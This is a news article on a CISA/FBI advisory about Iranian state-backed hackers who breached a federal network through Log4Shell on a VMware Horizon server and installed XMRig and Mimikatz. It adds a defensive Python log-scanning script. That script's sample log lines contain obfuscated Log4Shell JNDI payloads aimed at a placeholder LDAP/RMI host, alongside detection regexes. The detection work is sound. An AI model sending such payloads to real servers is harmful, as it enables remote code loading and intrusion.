The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI announced today that Iranian government-backed hackers compromised a federal agency's network through an unpatched Log4Shell vulnerability and used that access to steal users' credentials. CISA also observed that the hackers installed XMRig, open-source cryptocurrency mining software that attackers commonly deploy to mine virtual currency on compromised computers.
Iranian Government-backed Hackers Utilized Log4Shell Vulnerability to Initiate the Attack
According to CISA, the Iranian government-backed hackers exploited the Log4Shell vulnerability in an unpatched VMware Horizon server; the activity was first identified in April. CISA said it first observed the suspected activity while conducting a retrospective analysis using a government-run intrusion detection system. CISA and the FBI have encouraged all organizations with affected VMware systems to initiate threat-hunting activities.
Along with the XMRig crypto mining software, the threat actors also installed the open-source tool Mimikatz to harvest credentials and create a rogue domain administrator account. Dan Lorenc, CEO and co-founder of Chainguard, a supply chain cybersecurity company, said: "Log4Shell is endemic and it's going to be around forever; it will remain in every attacker's toolbox and continue to be used to gain access or for lateral movement for the foreseeable future."
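The threat-hunting recommendation above is easier to act on with a concrete starting point. The following Python script is an added example written for this page (it is not code from CISA, the FBI, or VMware) that scans web-access log lines for Log4Shell exploitation attempts, including the nested `${lower:...}` and `${::-...}` lookup tricks attackers use to hide the `${jndi:...}` string from naive pattern matching. The log lines and the `lookup-host.example` hostname are constructed sample data, not indicators from the advisory.

```python
import re

# Constructed sample access-log lines (not data from the advisory).
# Lines 2-4 carry JNDI lookups in the User-Agent field, with increasing obfuscation.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Nov/2022:12:00:01] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Nov/2022:12:00:07] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - [01/Nov/2022:12:00:09] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://lookup-host.example/b}"',
    '10.0.0.9 - - [01/Nov/2022:12:00:11] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://lookup-host.example/c}"',
    '10.0.0.12 - - [01/Nov/2022:12:00:20] "GET /portal/?q=${env:HOME} HTTP/1.1" 200 12 "-" "curl/7.8"',
]

# Innermost Log4j lookups that simply produce a literal string. Each pattern refuses
# to match across nested braces, so resolving them repeatedly unwraps nesting inside-out.
LOWER_LOOKUP = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
UPPER_LOOKUP = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
DEFAULT_ONLY = re.compile(r'\$\{::-([^${}]*)\}')  # "${::-x}" evaluates to "x"

# The resolved string we are hunting for, with the schemes seen in Log4Shell exploitation.
JNDI_LOOKUP = re.compile(
    r'\$\{\s*jndi\s*:\s*(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)[^}]*\}',
    re.IGNORECASE,
)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Resolve simple lower/upper/default lookups until the line stops changing."""
    for _ in range(max_rounds):
        resolved = LOWER_LOOKUP.sub(lambda m: m.group(1).lower(), line)
        resolved = UPPER_LOOKUP.sub(lambda m: m.group(1).upper(), resolved)
        resolved = DEFAULT_ONLY.sub(lambda m: m.group(1), resolved)
        if resolved == line:
            break
        line = resolved
    return line


def find_jndi(line: str) -> list:
    """Return every de-obfuscated JNDI lookup string found in one log line."""
    return [m.group(0) for m in JNDI_LOOKUP.finditer(normalize(line))]


def hunt(lines) -> list:
    """Return (1-based line number, [matches]) for each line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matches = find_jndi(line)
        if matches:
            hits.append((number, matches))
    return hits


if __name__ == "__main__":
    for number, matches in hunt(SAMPLE_LOGS):
        print(f"line {number}: {matches}")
```

Running the script flags lines 2, 3 and 4 and leaves the benign `${env:HOME}` line alone, because it only resolves the literal-producing lookups and then checks for `${jndi:`. Point `hunt()` at the access, Tomcat, or Horizon logs from the affected servers; a hit does not prove exploitation succeeded, so follow each one with a check for outbound LDAP or RMI connections from the server around the same timestamp and for the post-exploitation artefacts named in the advisory (XMRig processes, Mimikatz, newly created privileged accounts).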
US Sanctions More Iranians Over Cybercrimes
This is not the first time Iranian hackers have been charged with cybercrime activity. In September 2022, the U.S. Justice Department unsealed a criminal indictment accusing three Iranian nationals of hacking the networks of hundreds of victims in the United States. The US government has also been imposing sanctions on Iran: the Biden administration recently placed penalties on several Iranian companies, accusing them of being involved in the production of drones to assist Russia in the war.